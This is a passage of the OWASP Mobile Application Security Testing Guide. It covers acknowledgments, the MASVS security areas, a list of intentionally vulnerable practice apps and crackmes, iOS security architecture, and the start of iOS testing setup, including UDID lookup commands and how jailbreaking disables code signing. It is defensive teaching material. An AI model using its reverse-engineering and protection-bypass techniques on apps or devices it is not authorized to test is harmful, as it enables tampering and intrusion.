The mission of the ioXt Alliance is to build confidence in Internet of Things products through multi-stakeholder, international, harmonized, and standardized security and privacy requirements, product compliance programs, and public transparency of those requirements and programs.
In 2021, ioXt has extended its security principles through the Mobile Application profile, so that app developers can ensure their products are built with, and maintain, high cybersecurity standards such as the OWASP MASVS and the VPN Trust Initiative. The ioXt Mobile Application profile is a security standard that applies to any cloud connected mobile app and provides the much needed market transparency for consumer and commercial mobile app security.
Would you like to contribute with your case study? Connect with us!
"},{"location":"MASTG/Intro/0x02c-Acknowledgements/","title":"Acknowledgments","text":""},{"location":"MASTG/Intro/0x02c-Acknowledgements/#contributors","title":"Contributors","text":"All of our contributors are listed in the Contributing section of the OWASP MAS website:
https://mas.owasp.org/contributing/
"},{"location":"MASTG/Intro/0x02c-Acknowledgements/#mas-advocates","title":"\ud83e\udd47 MAS Advocates","text":"MAS Advocates are industry supporters of the OWASP MASVS and MASTG who have invested a significant and consistent amount of resources to push the project forward by providing consistent high-impact contributions and continuously spreading the word.
\ud83e\udd47 Being a \"MAS Advocate\" is the highest status that companies can achieve in the project, acknowledging that they've gone above and beyond to support the project.
MAS Advocates continuously support the project with time/dedicated resources with clear/high impact. To achieve this status, you'll need to demonstrate that you make consistent high-impact contributions to the project. For example:
The following will be considered but it's not a requirement:
If you'd like to apply please contact the project leaders by sending an email to Sven Schleier and Carlos Holguera who will validate your application and provide you with a contribution report. Please be sure to include sufficient evidence (e.g. including links to PRs) showing what you've done in the 6-month period that is in line with the three categories described above:
The OWASP Foundation is very grateful for the support by the individuals and organizations listed. However please note, the OWASP Foundation is strictly vendor neutral and does not endorse any of its supporters. MAS Advocates do not influence the content of the MASVS or MASTG in any way.
"},{"location":"MASTG/Intro/0x02c-Acknowledgements/#our-mas-advocates","title":"Our MAS Advocates","text":"NowSecure has provided consistent high-impact contributions to the project and has successfully helped spread the word.
We'd like to thank NowSecure for its exemplary contribution which sets a blueprint for other potential contributors wanting to push the project forward.
"},{"location":"MASTG/Intro/0x02c-Acknowledgements/#nowsecures-contributions-to-the-mas-project","title":"NowSecure's Contributions to the MAS Project","text":"High-impact Contributions (time/dedicated resources):
A special mention goes for the contribution to the MASVS Refactoring:
In the past, NowSecure has also contributed to the project, has sponsored it becoming a \"God Mode Sponsor\" and has donated the UnCrackable App for Android Level 4: Radare2 Pay.
Additionally:
Showing Adoption:
Spreading the Word:
While both the MASVS and the MASTG are created and maintained by the community on a voluntary basis, sometimes a little bit of outside help is required. We therefore thank our donators for providing the funds to be able to hire technical editors. Note that their donation does not influence the content of the MASVS or MASTG in any way. The Donation Packages are described on our OWASP Project page.
"},{"location":"MASTG/Intro/0x03-Overview/","title":"Introduction to the OWASP Mobile Application Security Project","text":"New technology always introduces new security risks, and security concerns for mobile apps differ from traditional desktop software in important ways. While modern mobile operating systems tend to be more secure than traditional desktop operating systems, problems can still appear if developers don't carefully consider security during mobile app development. These security risks often go beyond the usual concerns with data storage, inter-app communication, proper usage of cryptographic APIs, and secure network communication.
"},{"location":"MASTG/Intro/0x03-Overview/#how-to-use-the-mobile-application-security-project","title":"How to Use the Mobile Application Security Project","text":"First, the Project recommends that your mobile app security strategies should be based on the OWASP Mobile Application Security Verification Standard (MASVS), which defines a mobile app security model and lists generic security requirements for mobile apps. MASVS is designed to be used by architects, developers, testers, security professionals, and consumers to define and understand the qualities of a secure mobile app. After you have determined how OWASP MASVS applies to your mobile app's security model, the Project suggests that you use the OWASP Mobile Application Security Testing Guide (MASTG). The Testing Guide maps to the same basic set of security requirements offered by the MASVS and depending on the context, they can be used individually or combined to achieve different objectives.
For example, the MASVS requirements can be used in an app's planning and architecture design stages while the checklist and testing guide may serve as a baseline for manual security testing or as a template for automated security tests during or after development. In the \"Mobile App Security Testing\" chapter we'll describe how you can apply the checklist and MASTG to a mobile app penetration test.
"},{"location":"MASTG/Intro/0x03-Overview/#whats-covered-in-the-mobile-testing-guide","title":"What's Covered in the Mobile Testing Guide","text":"Throughout this guide, we will focus on apps for Android and iOS running on smartphones. These platforms are currently dominating the market and also run on other device classes including tablets, smartwatches, smart TVs, automotive infotainment units, and other embedded systems. Even if these additional device classes are out of scope, you can still apply most of the knowledge and testing techniques described in this guide with some deviance depending on the target device.
Given the vast amount of mobile app frameworks available it would be impossible to cover all of them exhaustively. Therefore, we focus on native apps on each operating system. However, the same techniques are also useful when dealing with web or hybrid apps (ultimately, no matter the framework, every app is based on native components).
"},{"location":"MASTG/Intro/0x03-Overview/#navigating-the-owasp-mastg","title":"Navigating the OWASP MASTG","text":"The MASTG contains descriptions of all requirements specified in the MASVS. The MASTG contains the following main sections:
The General Testing Guide contains a mobile app security testing methodology and general vulnerability analysis techniques as they apply to mobile app security. It also contains additional technical test cases that are OS-independent, such as authentication and session management, network communications, and cryptography.
The Android Testing Guide covers mobile security testing for the Android platform, including security basics, security test cases, reverse engineering techniques and prevention, and tampering techniques and prevention.
The iOS Testing Guide covers mobile security testing for the iOS platform, including an overview of the iOS OS, security testing, reverse engineering techniques and prevention, and tampering techniques and prevention.
Many mobile app penetration testers have a background in network and web app penetration testing, a quality that is valuable for mobile app testing. Almost every mobile app talks to a backend service, and those services are prone to the same types of attacks we are familiar with in web apps on desktop machines. Mobile apps have a smaller attack surface and therefore have more security against injection and similar attacks. Instead, the MASTG prioritizes data protection on the device and the network to increase mobile security.
"},{"location":"MASTG/Intro/0x03-Overview/#owasp-masvs-overview-key-areas-in-mobile-application-security","title":"OWASP MASVS Overview: Key Areas in Mobile Application Security","text":"This overview discusses how the MASVS defines and describes the key areas of mobile security:
The Standard is based on the principle that protecting sensitive data, such as user credentials and private information, is crucial to mobile security. If an app does not use operating system APIs properly, especially those that handle local storage or inter-process communication (IPC), the app could expose sensitive data to other apps running on the same device or may unintentionally leak data to cloud storage, backups, or the keyboard cache. And since mobile devices are more likely to be lost or stolen, attackers can actually gain physical access to the device, which would make it easier to retrieve the data.
Thus we must take extra care to protect stored user data in mobile apps. Some solutions may include appropriate key storage APIs and using hardware-backed security features (when available).
Fragmentation is a problem we deal with especially on Android devices. Not every Android device offers hardware-backed secure storage, and many devices are running outdated versions of Android. For an app to be supported on these out-of-date devices, it would have to be created using an older version of Android's API which may lack important security features. For maximum security, the best choice is to create apps with the current API version even though that excludes some users.
"},{"location":"MASTG/Intro/0x03-Overview/#masvs-crypto-cryptography","title":"MASVS-CRYPTO: Cryptography","text":"Cryptography is an essential ingredient when it comes to protecting data stored on a mobile device. It is also an area where things can go horribly wrong, especially when standard conventions are not followed. It is essential to ensure that the application uses cryptography according to industry best practices, including the use of proven cryptographic libraries, a proper choice and configuration of cryptographic primitives as well as a suitable random number generator wherever randomness is required.
"},{"location":"MASTG/Intro/0x03-Overview/#masvs-auth-authentication-and-authorization","title":"MASVS-AUTH: Authentication and Authorization","text":"In most cases, sending users to log in to a remote service is an integral part of the overall mobile app architecture. Even though most of the authentication and authorization logic happens at the endpoint, there are also some implementation challenges on the mobile app side. Unlike web apps, mobile apps often store long-time session tokens that are unlocked with user-to-device authentication features such as fingerprint scanning. While this allows for a quicker login and better user experience (nobody likes to enter complex passwords), it also introduces additional complexity and room for error.
Mobile app architectures also increasingly incorporate authorization frameworks (such as OAuth2) that delegate authentication to a separate service or outsource the authentication process to an authentication provider. Using OAuth2 allows the client-side authentication logic to be outsourced to other apps on the same device (e.g. the system browser). Security testers must know the advantages and disadvantages of different possible authorization frameworks and architectures.
"},{"location":"MASTG/Intro/0x03-Overview/#masvs-network-network-communication","title":"MASVS-NETWORK: Network Communication","text":"Mobile devices regularly connect to a variety of networks, including public Wi-Fi networks shared with other (potentially malicious) clients. This creates opportunities for a wide variety of network-based attacks ranging from simple to complicated and old to new. It's crucial to maintain the confidentiality and integrity of information exchanged between the mobile app and remote service endpoints. As a basic requirement, mobile apps must set up a secure, encrypted channel for network communication using the TLS protocol with appropriate settings.
"},{"location":"MASTG/Intro/0x03-Overview/#masvs-platform-interaction-with-the-mobile-platform","title":"MASVS-PLATFORM: Interaction with the Mobile Platform","text":"Mobile operating system architectures differ from classical desktop architectures in important ways. For example, all mobile operating systems implement app permission systems that regulate access to specific APIs. They also offer more (Android) or less rich (iOS) inter-process communication (IPC) facilities that enable apps to exchange signals and data. These platform-specific features come with their own set of pitfalls. For example, if IPC APIs are misused, sensitive data or functionality might be unintentionally exposed to other apps running on the device.
"},{"location":"MASTG/Intro/0x03-Overview/#masvs-code-code-quality-and-exploit-mitigation","title":"MASVS-CODE: Code Quality and Exploit Mitigation","text":"Traditional injection and memory management issues aren't often seen in mobile apps due to the smaller attack surface. Mobile apps mostly interact with the trusted backend service and the UI, so even if many buffer overflow vulnerabilities exist in the app, those vulnerabilities usually don't open up any useful attack vectors. The same applies to browser exploits such as cross-site scripting (XSS allows attackers to inject scripts into web pages) that are very prevalent in web apps. However, there are always exceptions. XSS is theoretically possible on mobile in some cases, but it's very rare to see XSS issues that an individual can exploit.
This protection from injection and memory management issues doesn't mean that app developers can get away with writing sloppy code. Following security best practices results in hardened (secure) release builds that are resilient against tampering. Free security features offered by compilers and mobile SDKs help increase security and mitigate attacks.
"},{"location":"MASTG/Intro/0x03-Overview/#masvs-resilience-anti-tampering-and-anti-reversing","title":"MASVS-RESILIENCE: Anti-Tampering and Anti-Reversing","text":"There are three things you should never bring up in polite conversations: religion, politics, and code obfuscation. Many security experts dismiss client-side protections outright. However, software protection controls are widely used in the mobile app world, so security testers need ways to deal with these protections. We believe there's a benefit to client-side protections if they are employed with a clear purpose and realistic expectations in mind and aren't used to replace security controls.
"},{"location":"MASTG/Intro/0x09-Suggested-Reading/","title":"Suggested Reading","text":""},{"location":"MASTG/Intro/0x09-Suggested-Reading/#mobile-app-security","title":"Mobile App Security","text":""},{"location":"MASTG/Intro/0x09-Suggested-Reading/#android","title":"Android","text":"The applications listed below can be used as training materials. Note: only the MASTG apps and Crackmes are tested and maintained by the MAS project.
"},{"location":"MASTG/apps/#android-apps","title":"Android Apps","text":"ID Name Platform MASTG-APP-0002 Android License Validator android MASTG-APP-0009 DVHMA android MASTG-APP-0011 MASTG Hacking Playground (Java) android MASTG-APP-0007 DIVA Android android MASTG-APP-0008 DodoVulnerableBank android MASTG-APP-0004 Android UnCrackable L2 android MASTG-APP-0003 Android UnCrackable L1 android MASTG-APP-0013 OVAA android MASTG-APP-0010 InsecureBankv2 android MASTG-APP-0012 MASTG Hacking Playground (Kotlin) android MASTG-APP-0006 Digitalbank android MASTG-APP-0005 Android UnCrackable L3 android MASTG-APP-0001 AndroGoat android MASTG-APP-0015 Android UnCrackable L4 android MASTG-APP-0014 InsecureShop android"},{"location":"MASTG/apps/#ios-apps","title":"Ios Apps","text":"ID Name Platform MASTG-APP-0026 iOS UnCrackable L2 ios MASTG-APP-0024 DVIA-v2 ios MASTG-APP-0023 DVIA ios MASTG-APP-0025 iOS UnCrackable L1 ios"},{"location":"MASTG/apps/android/MASTG-APP-0001/","title":"AndroGoat","text":"An open source vulnerable/insecure app using Kotlin. This app has a wide range of vulnerabilities related to certificate pinning, custom URL schemes, Android Network Security Configuration, WebViews, root detection and over 20 other vulnerabilities.
"},{"location":"MASTG/apps/android/MASTG-APP-0002/","title":"Android License Validator","text":"The Android License Validator is a crackme that implements a key validation function in native code, packaged as a standalone ELF executable for Android devices. Analyzing native code is often more challenging than Java, which is why critical business logic is frequently written this way.
While this sample application may not represent a real-world scenario, it serves as a valuable learning tool to grasp the basics of symbolic execution. These insights can be applied in practical situations, especially when dealing with Android apps that include obfuscated native libraries. In fact, obfuscated code is often put into native libraries specifically to make the process of de-obfuscation more challenging.
By Bernhard Mueller
"},{"location":"MASTG/apps/android/MASTG-APP-0003/","title":"Android UnCrackable L1","text":"A secret string is hidden somewhere in this app. Find a way to extract it.
By Bernhard Mueller
"},{"location":"MASTG/apps/android/MASTG-APP-0004/","title":"Android UnCrackable L2","text":"This app holds a secret inside. May include traces of native code.
By Bernhard Mueller. Special thanks to Michael Helwig for finding and fixing an oversight in the anti-tampering mechanism.
"},{"location":"MASTG/apps/android/MASTG-APP-0005/","title":"Android UnCrackable L3","text":"The crackme from hell! A secret string is hidden somewhere in this app. Find a way to extract it.
By Bernhard Mueller. Special thanks to Eduardo Novella for testing, feedback and pointing out flaws in the initial build(s).
"},{"location":"MASTG/apps/android/MASTG-APP-0006/","title":"Digitalbank","text":"A vulnerable app created in 2015, which can be used on older Android platforms.
"},{"location":"MASTG/apps/android/MASTG-APP-0007/","title":"DIVA Android","text":"An app intentionally designed to be insecure which has received updates in 2016 and contains 13 different challenges.
"},{"location":"MASTG/apps/android/MASTG-APP-0008/","title":"DodoVulnerableBank","text":"An insecure Android app from 2015.
"},{"location":"MASTG/apps/android/MASTG-APP-0009/","title":"DVHMA","text":"A hybrid mobile app (for Android) that intentionally contains vulnerabilities.
"},{"location":"MASTG/apps/android/MASTG-APP-0010/","title":"InsecureBankv2","text":"A vulnerable Android app made for security enthusiasts and developers to learn the Android insecurities by testing a vulnerable application. It has been updated in 2018 and contains a lot of vulnerabilities.
"},{"location":"MASTG/apps/android/MASTG-APP-0011/","title":"MASTG Hacking Playground (Java)","text":"A vulnerable Android app by the OWASP MAS project. See included vulnerabilities in here.
"},{"location":"MASTG/apps/android/MASTG-APP-0012/","title":"MASTG Hacking Playground (Kotlin)","text":"A vulnerable Android app by the OWASP MAS project.
"},{"location":"MASTG/apps/android/MASTG-APP-0013/","title":"OVAA","text":"An Android app that aggregates all the platform's known and popular security vulnerabilities.
"},{"location":"MASTG/apps/android/MASTG-APP-0014/","title":"InsecureShop","text":"InsecureShop is an intentionally designed Android application that showcases vulnerabilities, aiming to educate developers and security experts about common pitfalls within modern Android apps. It serves as a dynamic platform for refining Android pentesting skills.
The majority of these vulnerabilities can be exploited on non-rooted devices, posing risks from both remote users and malicious third-party applications. Notably, the app doesn't utilize any APIs. InsecureShop presents an opportunity to explore a range of vulnerabilities:
Complementing these learning experiences, InsecureShop provides documentation about the implemented vulnerabilities and their associated code. This documentation, however, refrains from offering complete solutions for each vulnerability showcased within the InsecureShop app.
"},{"location":"MASTG/apps/android/MASTG-APP-0015/","title":"Android UnCrackable L4","text":"The Radare2 community always dreamed with its decentralized and free currency to allow r2 fans to make payments in places and transfer money between r2 users. A debug version of the r2Pay app has been developed and it will be supported very soon in many stores and websites. Can you verify that this is cryptographically unbreakable?
Hint: Run the APK in a non-tampered device to play a bit with the app.
r2con{PIN_NUMERIC:SALT_LOWERCASE}
r2con{ascii(key)}
Versions:
v0.9
- Release for OWASP MAS: Source code is available and the compilation has been softened in many ways to make the challenge easier and more enjoyable for newcomers.v1.0
- Release for R2con CTF 2020: No source code is available and many extra protections are in place.Created and maintained by Eduardo Novella & Gautam Arvind. Special thanks to NowSecure for supporting this crackme.
"},{"location":"MASTG/apps/ios/MASTG-APP-0023/","title":"DVIA","text":"A vulnerable iOS app written in Objective-C which provides a platform to mobile security enthusiasts/professionals or students to test their iOS penetration testing skills.
"},{"location":"MASTG/apps/ios/MASTG-APP-0024/","title":"DVIA-v2","text":"A vulnerable iOS app, written in Swift with over 15 vulnerabilities.
"},{"location":"MASTG/apps/ios/MASTG-APP-0025/","title":"iOS UnCrackable L1","text":"A secret string is hidden somewhere in this app. Find a way to extract it.
By Bernhard Mueller
"},{"location":"MASTG/apps/ios/MASTG-APP-0026/","title":"iOS UnCrackable L2","text":"This app holds a secret inside - and this time it won't be tampered with!
By Bernhard Mueller
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/","title":"iOS Platform Overview","text":"iOS is a mobile operating system that powers Apple mobile devices, including the iPhone, iPad, and iPod Touch. It is also the basis for Apple tvOS, which inherits many functionalities from iOS. This section introduces the iOS platform from an architecture point of view. The following five key areas are discussed:
Like the Apple desktop operating system macOS (formerly OS X), iOS is based on Darwin, an open source Unix operating system developed by Apple. Darwin's kernel is XNU (\"X is Not Unix\"), a hybrid kernel that combines components of the Mach and FreeBSD kernels.
However, iOS apps run in a more restricted environment than their desktop counterparts do. iOS apps are isolated from each other at the file system level and are significantly limited in terms of system API access.
To protect users from malicious applications, Apple restricts and controls access to the apps that are allowed to run on iOS devices. Apple's App Store is the only official application distribution platform. There developers can offer their apps and consumers can buy, download, and install apps. This distribution style differs from Android, which supports several app stores and sideloading (installing an app on your iOS device without using the official App Store). In iOS, sideloading typically refers to the app installation method via USB, although there are other enterprise iOS app distribution methods that do not use the App Store under the Apple Developer Enterprise Program.
In the past, sideloading was possible only with a jailbreak or complicated workarounds. With iOS 9 or higher, it is possible to sideload via Xcode.
iOS apps are isolated from each other via Apple's iOS sandbox (historically called Seatbelt), a mandatory access control (MAC) mechanism describing the resources an app can and can't access. Compared to Android's extensive Binder IPC facilities, iOS offers very few IPC (Inter Process Communication) options, minimizing the potential attack surface.
Uniform hardware and tight hardware/software integration create another security advantage. Every iOS device offers security features, such as secure boot, hardware-backed Keychain, and file system encryption (referred to as data protection in iOS). iOS updates are usually quickly rolled out to a large percentage of users, decreasing the need to support older, unprotected iOS versions.
In spite of the numerous strengths of iOS, iOS app developers still need to worry about security. Data protection, Keychain, Touch ID/Face ID authentication, and network security still leave a large margin for errors. In the following chapters, we describe iOS security architecture, explain a basic security testing methodology, and provide reverse engineering how-tos.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#ios-security-architecture","title":"iOS Security Architecture","text":"The iOS security architecture, officially documented by Apple in the iOS Security Guide, consists of six core features. This security guide is updated by Apple for each major iOS version:
The iOS security architecture makes good use of hardware-based security features that enhance overall performance. Each iOS device comes with two built-in Advanced Encryption Standard (AES) 256-bit keys. The device\u2019s unique IDs (UIDs) and device group IDs (GIDs) are AES 256-bit keys fused (UID) or compiled (GID) into the Application Processor (AP) and Secure Enclave Processor (SEP) during manufacturing. There's no direct way to read these keys with software or debugging interfaces such as JTAG. Encryption and decryption operations are performed by hardware AES crypto-engines that have exclusive access to these keys.
The GID is a value shared by all processors in a class of devices used to prevent tampering with firmware files and other cryptographic tasks not directly related to the user's private data. UIDs, which are unique to each device, are used to protect the key hierarchy that's used for device-level file system encryption. Because UIDs aren't recorded during manufacturing, not even Apple can restore the file encryption keys for a particular device.
To allow secure deletion of sensitive data on flash memory, iOS devices include a feature called Effaceable Storage. This feature provides direct low-level access to the storage technology, making it possible to securely erase selected blocks.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#secure-boot","title":"Secure Boot","text":"When an iOS device is powered on, it reads the initial instructions from the read-only memory known as Boot ROM, which bootstraps the system. The Boot ROM contains immutable code and the Apple Root CA, which is etched into the silicon chip during the fabrication process, thereby creating the root of trust. Next, the Boot ROM makes sure that the LLB's (Low Level Bootloader) signature is correct, and the LLB checks that the iBoot bootloader's signature is correct too. After the signature is validated, the iBoot checks the signature of the next boot stage, which is the iOS kernel. If any of these steps fail, the boot process will terminate immediately and the device will enter recovery mode and display the restore screen. However, if the Boot ROM fails to load, the device will enter a special low-level recovery mode called Device Firmware Upgrade (DFU). This is the last resort for restoring the device to its original state. In this mode, the device will show no sign of activity; i.e., its screen won't display anything.
This entire process is called the \"Secure Boot Chain\". Its purpose is focused on verifying the boot process integrity, ensuring that the system and its components are written and distributed by Apple. The Secure Boot chain consists of the kernel, the bootloader, the kernel extension, and the baseband firmware.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#code-signing","title":"Code Signing","text":"Apple has implemented an elaborate DRM system to make sure that only Apple-approved code runs on their devices, that is, code signed by Apple. In other words, you won't be able to run any code on an iOS device that hasn't been jailbroken unless Apple explicitly allows it. End users are supposed to install apps through the official Apple's App Store only. For this reason (and others), iOS has been compared to a crystal prison.
A developer profile and an Apple-signed certificate are required to deploy and run an application. Developers need to register with Apple, join the Apple Developer Program and pay a yearly subscription to get the full range of development and deployment possibilities. There's also a free developer account that allows you to compile and deploy apps (but not distribute them in the App Store) via sideloading.
According to the Archived Apple Developer Documentation the code signature consists of three parts:
Learn more:
FairPlay Code Encryption is applied to apps downloaded from the App Store. FairPlay was developed as a DRM when purchasing multimedia content. Originally, FairPlay encryption was applied to MPEG and QuickTime streams, but the same basic concepts can also be applied to executable files. The basic idea is as follows: Once you register a new Apple user account, or Apple ID, a public/private key pair will be created and assigned to your account. The private key is securely stored on your device. This means that FairPlay-encrypted code can be decrypted only on devices associated with your account. Reverse FairPlay encryption is usually obtained by running the app on the device, then dumping the decrypted code from memory (see also \"Basic Security Testing on iOS\").
Apple has built encryption into the hardware and firmware of its iOS devices since the release of the iPhone 3GS. Every device has a dedicated hardware-based cryptographic engine that provides an implementation of the AES 256-bit encryption and the SHA-1 hashing algorithms. In addition, there's a unique identifier (UID) built into each device's hardware with an AES 256-bit key fused into the Application Processor. This UID is unique and not recorded elsewhere. At the time of writing, neither software nor firmware can directly read the UID. Because the key is burned into the silicon chip, it can't be tampered with or bypassed. Only the crypto engine can access it.
Building encryption into the physical architecture makes it a default security feature that can encrypt all data stored on an iOS device. As a result, data protection is implemented at the software level and works with the hardware and firmware encryption to provide more security.
When data protection is enabled, by simply establishing a passcode in the mobile device, each data file is associated with a specific protection class. Each class supports a different level of accessibility and protects data on the basis of when the data needs to be accessed. The encryption and decryption operations associated with each class are based on multiple key mechanisms that utilize the device's UID and passcode, a class key, a file system key, and a per-file key. The per-file key is used to encrypt the file's contents. The class key is wrapped around the per-file key and stored in the file's metadata. The file system key is used to encrypt the metadata. The UID and passcode protect the class key. This operation is invisible to users. To enable data protection, the passcode must be used when accessing the device. The passcode unlocks the device. Combined with the UID, the passcode also creates iOS encryption keys that are more resistant to hacking and brute-force attacks. Enabling data protection is the main reason for users to use passcodes on their devices.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#sandbox","title":"Sandbox","text":"The app sandbox is an iOS access control technology. It is enforced at the kernel level. Its purpose is limiting system and user data damage that may occur when an app is compromised.
Sandboxing has been a core security feature since the first release of iOS. All third-party apps run under the same user (mobile
), and only a few system applications and services run as root
(or other specific system users). Regular iOS apps are confined to a container that restricts access to the app's own files and a very limited number of system APIs. Access to all resources (such as files, network sockets, IPCs, and shared memory) is controlled by the sandbox. These restrictions work as follows [#levin]:
mmap
and mprotect
system calls are modified to prevent apps from making writable memory pages executable and stopping processes from executing dynamically generated code. In combination with code signing and FairPlay, this strictly limits what code can run under specific circumstances (e.g., all code in apps distributed via the App Store is approved by Apple).iOS implements address space layout randomization (ASLR) and eXecute Never (XN) bit to mitigate code execution attacks.
ASLR randomizes the memory location of the program's executable file, data, heap, and stack every time the program is executed. Because the shared libraries must be static to be accessed by multiple processes, the addresses of shared libraries are randomized every time the OS boots instead of every time the program is invoked. This makes specific function and library memory addresses hard to predict, thereby preventing attacks such as the return-to-libc attack, which involves the memory addresses of basic libc functions.
The XN mechanism allows iOS to mark selected memory segments of a process as non-executable. On iOS, the process stack and heap of user-mode processes is marked non-executable. Pages that are writable cannot be marked executable at the same time. This prevents attackers from executing machine code injected into the stack or heap.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#software-development-on-ios","title":"Software Development on iOS","text":"Like other platforms, Apple provides a Software Development Kit (SDK) that helps developers to develop, install, run, and test native iOS Apps. Xcode is an Integrated Development Environment (IDE) for Apple software development. iOS applications are developed in Objective-C or Swift.
Objective-C is an object-oriented programming language that adds Smalltalk-style messaging to the C programming language. It is used on macOS to develop desktop applications and on iOS to develop mobile applications. Swift is the successor of Objective-C and allows interoperability with Objective-C.
Swift was introduced with Xcode 6 in 2014.
On a non-jailbroken device, there are two ways to install an application out of the App Store:
iOS apps are distributed in IPA (iOS App Store Package) archives. The IPA file is a ZIP-compressed archive that contains all the code and resources required to execute the app.
IPA files have a built-in directory structure. The example below shows this structure at a high level:
/Payload/
folder contains all the application data. We will come back to the contents of this folder in more detail./Payload/Application.app
contains the application data itself (ARM-compiled code) and associated static resources./iTunesArtwork
is a 512x512 pixel PNG image used as the application's icon./iTunesMetadata.plist
contains various bits of information, including the developer's name and ID, the bundle identifier, copyright information, genre, the name of the app, release date, purchase date, etc./WatchKitSupport/WK
is an example of an extension bundle. This specific bundle contains the extension delegate and the controllers for managing the interfaces and responding to user interactions on an Apple Watch.Let's take a closer look at the different files in the IPA container. Apple uses a relatively flat structure with few extraneous directories to save disk space and simplify file access. The top-level bundle directory contains the application's executable file and all the resources the application uses (for example, the application icon, other images, and localized content).
A language.lproj folder exists for each language that the application supports. It contains a storyboard and strings file.
On a jailbroken device, you can recover the IPA for an installed iOS app using different tools that allow decrypting the main app binary and reconstruct the IPA file. Similarly, on a jailbroken device you can install the IPA file with IPA Installer. During mobile security assessments, developers often give you the IPA directly. They can send you the actual file or provide access to the development-specific distribution platform they use, e.g. TestFlight or Visual Studio App Center.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#app-permissions","title":"App Permissions","text":"In contrast to Android apps (before Android 6.0 (API level 23)), iOS apps don't have pre-assigned permissions. Instead, the user is asked to grant permission during runtime, when the app attempts to use a sensitive API for the first time. Apps that have been granted permissions are listed in the Settings > Privacy menu, allowing the user to modify the app-specific setting. Apple calls this permission concept privacy controls.
iOS developers can't set requested permissions directly, these will be requested indirectly when accessing sensitive APIs. For example, when accessing a user's contacts, any call to CNContactStore blocks the app while the user is being asked to grant or deny access. Starting with iOS 10.0, apps must include usage description keys for the types of permissions they request and data they need to access (e.g., NSContactsUsageDescription).
The following APIs require user permission:
The DeviceCheck framework, including its components DeviceCheck and App Attest, helps you prevent fraudulent use of your services. It consists of a framework that you use from your app and an Apple server which is accessible only to your own server. DeviceCheck allows you to persistently store information on the device and on Apple servers. The stored information remains intact across app reinstallation, device transfers, or resets, with the option to reset this data periodically.
DeviceCheck is typically used to mitigate fraud by restricting access to sensitive resources. For example, limiting promotions to once per device, identifying and flagging fraudulent devices, etc. However, it definitely cannot prevent all fraud. For example, it is not meant to detect compromised operating systems (aka. jailbreak detection).
For more information, refer to the DeviceCheck documentation.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#app-attest","title":"App Attest","text":"App Attest, available under the DeviceCheck framework, helps you verify instances of the app running on a device by enabling apps to attach a hardware-backed assertion to requests, ensuring they originate from the legitimate app on a genuine Apple device. This feature aids in preventing modified apps from communicating with your server.
The process involves generating and validating cryptographic keys, along with a set of verifications performed by your server, ensuring the authenticity of the request. It is important to note that while App Attest enhances security, it does not guarantee complete protection against all forms of fraudulent activities.
For more detailed information, refer to the WWDC 2021 session, along with the App Attest documentation and App Attest implementation guide.
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/","title":"iOS Security Testing","text":"In this chapter, we'll dive into setting up a security testing environment and introduce you to some practical processes and techniques for testing the security of iOS apps. These are the building blocks for the MASTG test cases.
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#ios-testing-setup","title":"iOS Testing Setup","text":"Although you can use a Linux or Windows host computer for testing, you'll find that many tasks are difficult or impossible on these platforms. In addition, the Xcode development environment and the iOS SDK are only available for macOS. This means that you'll definitely want to work on macOS for source code analysis and debugging (it also makes black box testing easier).
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#host-device","title":"Host Device","text":"The following is the most basic iOS app testing setup:
The UDID is a unique 40-character sequence of letters and numbers used to identify an iOS device. You can find the UDID of your iOS device on macOS Catalina onwards in the Finder app, as iTunes is not available anymore in Catalina. Open Finder and select the connected iOS device in the sidebar.
Click on the text containing the model, storage capacity, and battery information, and it will display the serial number, UDID, and model instead:
You can copy the UDID by right clicking on it.
It is also possible to get the UDID via various command line tools on macOS while the device is attached via USB:
By using the I/O Registry Explorer tool ioreg
:
$ ioreg -p IOUSB -l | grep \"USB Serial\"\n| \"USB Serial Number\" = \"9e8ada44246cee813e2f8c1407520bf2f84849ec\"\n
By using ideviceinstaller (also available on Linux):
$ brew install ideviceinstaller\n$ idevice_id -l\n316f01bd160932d2bf2f95f1f142bc29b1c62dbc\n
By using the system_profiler:
$ system_profiler SPUSBDataType | sed -n -e '/iPad/,/Serial/p;/iPhone/,/Serial/p;/iPod/,/Serial/p' | grep \"Serial Number:\"\n2019-09-08 10:18:03.920 system_profiler[13251:1050356] SPUSBDevice: IOCreatePlugInInterfaceForService failed 0xe00002be\n Serial Number: 64655621de6ef5e56a874d63f1e1bdd14f7103b1\n
By using instruments:
instruments -s devices\n
You should have a jailbroken iPhone or iPad for running tests. These devices allow root access and tool installation, making the security testing process more straightforward. If you don't have access to a jailbroken device, you can apply the workarounds described later in this chapter, but be prepared for a more difficult experience.
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#testing-on-the-ios-simulator","title":"Testing on the iOS Simulator","text":"Unlike the Android emulator, which fully emulates the hardware of an actual Android device, the iOS SDK simulator offers a higher-level simulation of an iOS device. Most importantly, simulator binaries are compiled to x86 code instead of ARM code. Apps compiled for a real device don't run, making the simulator useless for black box analysis and reverse engineering.
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#testing-on-an-emulator","title":"Testing on an Emulator","text":"Corellium is the only publicly available iOS emulator. It is an enterprise SaaS solution with a per user license model and does not offer community licenses.
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#getting-privileged-access","title":"Getting Privileged Access","text":"iOS jailbreaking is often compared to Android rooting, but the process is actually quite different. To explain the difference, we'll first review the concepts of \"rooting\" and \"flashing\" on Android.
su
binary on the system or replacing the whole system with a rooted custom ROM. Exploits aren't required to obtain root access as long as the bootloader is accessible.On iOS devices, flashing a custom ROM is impossible because the iOS bootloader only allows Apple-signed images to be booted and flashed. This is why even official iOS images can't be installed if they aren't signed by Apple, and it makes iOS downgrades only possible for as long as the previous iOS version is still signed.
The purpose of jailbreaking is to disable iOS protections (Apple's code signing mechanisms in particular) so that arbitrary unsigned code can run on the device (e.g. custom code or downloaded from alternative app stores such as Cydia or Sileo). The word \"jailbreak\" is a colloquial reference to all-in-one tools that automate the disabling process.
